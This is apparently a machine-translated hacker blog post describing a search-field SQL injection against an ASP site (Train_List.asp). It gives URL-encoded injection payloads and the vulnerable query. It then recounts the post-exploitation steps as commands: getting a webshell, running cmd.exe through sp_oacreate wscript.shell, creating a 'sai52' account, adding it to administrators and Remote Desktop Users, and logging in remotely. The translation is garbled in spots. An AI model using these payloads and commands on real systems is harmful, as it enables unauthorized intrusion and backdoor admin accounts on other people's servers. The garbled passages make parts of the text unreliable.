A Simple Analysis of search-type non-variable injection points

Author: Sai52 [B. H.S. T]
Blog: www.sai52.com

Let me get rid of a injection point the day before. I went to dinner on my own. Here I despise him first.

Injection Point "http://www.site.com/Train_List.asp? Xyz ="
This feature allows injection without variables, but the response speed is extremely slow.

Go to the homepage www.site.com and find that there are basically no search boxes available.
Add "" in the search box, click "Search", get error page "http://www.site.com/main.asp? Xyz ="

Error message:
Microsoft ole db Provider for SQL Server Error 80040e14
The string order by gceek contains unclosed quotation marks.
/Train_List.asp, row 25

Add "%" in the search box, click "Search", after about 1 minute (the relationship between data, not slow network speed), get the normal display page "http://www.sitel.com/main.asp? Xyz = %"

Search injection exists.
Further test, get a keyword "Beijing" that can be queried ", enter "Beijing % and 1 = 1 and % =" and "Beijing % and 1 = 2 and % =" in the input box to search separately. The obtained page is the same, are empty pages without data.

Based on the preceding error message, we can guess that "http://www.site.com/main.asp?is only a page, and the page that is being injected should be http://www.site.com/Train_List.asp ".

Search "http://www.site.com/train_list.asp" on google and find a record" http://www.site.com/Train_List.asp? Xyz = % C9 % CF % BA % A3 ". Click it to open it normally, the search result of the keyword "Shanghai" is displayed ("% C9 % CF % BA % A3" is the url code of "Shanghai ).

Combined with the previous information, you can determine the http://www.site.com/Train_List.asp parameter is xyz, further test:
Http://www.site.com/Train_List.asp? Xyz = % B1 % B1 % BE % A9 % 25% 27% 20% 61% 6E % 64% 20% 27% 31% 27% 3D % 27% 31% 27% 20% 61% 6E % 64% 20% 27% 25% 3D % 27
(Url encoding of "Beijing % and 1 = 1 and % =)

Returns the search result of the keyword "Beijing.

Http://www.site.com/Train_List.asp? Xyz = % B1 % B1 % BE % A9 % 25% 27% 20% 61% 6E % 64% 20% 27% 31% 27% 3D % 27% 32% 27% 20% 61% 6E % 64% 20% 27% 25% 3D % 27
(Url encoding of "Beijing % and 1 = 2 and % =)

Returns a blank page without data.

This determines that there is an injection point.
Pick a keyword "Guangdong East" (in order to speed up the response) with the least data, construct the url: "http://www.site.com/Train_List.asp? Xyz = Guangdong East % "is put into the injection vulnerability scanner for scanning. Haha, the speed is fast and everything will soon come out.

So "http://www.site.com/Train_List.asp? Xyz = "why can it be injected without variables?
Analyze the source code

Key statements
Elseif xyz <> "then
SQL = "select * from Train_all where lm like %" & xyz & "% order by gceek"

If the parameter "xyz" is not null, It is substituted into the query.

The statement we constructed earlier is "Beijing % and 1 = 1 and % ="
SQL = "select * from Train_all where lm like % Beijing % and 1 = 1 and % = % order by gceek"
Construct the injection. The result is all data that contains the keyword "Beijing.

Substitute the constructor statement "and 1 = 1 and % =" without Variables"
SQL = "select * from Train_all where lm like % and 1 = 1 and % = % order by gceek"
It also constitutes an injection. Because "%" is a wildcard, the result is all the data in the queried data table.

When a query is performed without a variable injection, the server returns all the data in the queried data table. The response speed is of course slow.

Follow-up:
Then it is easy. The sa permission injection points are strictly set by the Administrator. The xp_mongoshell storage extension and the xplog70.dll file are deleted. The obtained webshell does not have the write and delete permissions, and has the read and modify permissions. Modify the webshell code as an asp probe, find the wscript. shell (command line Execution Component), find the connection account and password, connect it with the query analyzer, and execute
Declare @ shell int exec sp_oacreate wscript. shell, @ shell output exec sp_oamethod
@ Shell, run, null, c: windowssystem32cmd.exe/c net user sai52 xxxxxxxxxxxx/add successfully added users.

(Sp_oacreate: wscript. shell and scripting. FileSystemObject are required to run CMD and display echo)

Then I directly run the command with the tool NBSI.
Net localgroup administrators sai52/add
Net user sai52/active: yes
Net localgroup "Remote Desktop Users" sai52/add
Log on to MySQL 3389.